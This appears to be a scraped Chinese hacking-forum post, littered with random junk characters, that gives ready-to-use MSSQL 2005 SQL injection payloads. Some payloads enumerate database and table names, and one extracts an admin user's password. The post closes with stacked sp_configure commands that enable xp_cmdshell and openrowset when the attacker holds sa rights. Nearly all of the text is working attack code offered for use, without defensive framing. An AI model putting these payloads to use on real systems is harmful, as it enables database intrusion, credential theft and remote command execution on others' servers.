" c/ L0 P% l7 S5 x, o' V
3 \! K, C' V7 S% k: j4 V. ~* K8 G; Z \+ R
[Copy to clipboard]CODE:8 e, T7 A i6 @0 }
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
2 N" L* i+ S' a& `% w$ X8 t* z+ \9 M: m
爆表语句,somedb部份是所要列的数据库,红色数字1累加
+ e& J+ d$ i# j8 X/ B' u1 b" O
, k! i; a4 \; |9 m6 t& e2 X6 \+ Y* I% F6 n
[Copy to clipboard]CODE:$ b7 k# L( v3 {; L; u
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
8 I' h' z8 K5 e0 W: K8 |7 a g/ D7 w4 M$ q" \
爆字段语句,爆表admin里user='icerover'的密码段8 L* Q$ {, P, ^% |% ~
1 m1 L9 ^; R/ o7 }/ x
K% U' L# u- n0 u( m% v7 R9 L[Copy to clipboard]CODE:* I5 q; Y2 W3 S2 ]
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--& r/ W1 K) `' ~
, c I4 ^1 R* t* U) j
mssql2005默认没有开xp_cmdshell的,openrowset也不能用' j9 Y6 x0 v9 a, ~7 F
如果是sa权限,可以这样来开启
6 g; K" c! E0 z! \# e7 i/ `% g开启openrowset
4 v. w2 ?) i O3 ?& x; o* s0 B3 O5 c! p" n6 A
% l2 k3 u5 ?5 s" o7 H+ w7 ^0 ~[Copy to clipboard]CODE:, Y* C% y9 r8 _( r4 [: @6 p
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--- S8 q7 Z/ [+ s- `2 t; ^# T
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--' |7 E5 x% ^$ t/ J+ E. W; c
6 W/ k3 O5 o5 N* y开启xp_cmdshell) N; U* [; D/ b% G/ a! [6 g, x
, D5 T4 l- D T8 w; l
2 e8 }% V0 I6 o0 {! W
[Copy to clipboard]CODE:
# }( a9 y* @4 E4 h5 E. HEXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
. v5 e. n- {# }5 p# o0 ?7 m v( \EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
1 _! ~! l2 X, f) P. [; d* E, @3 S5 A5 `7 d- ?/ S! p0 c
ok,over~~晚安
8 Z( M% c! N, w5 S: X# v |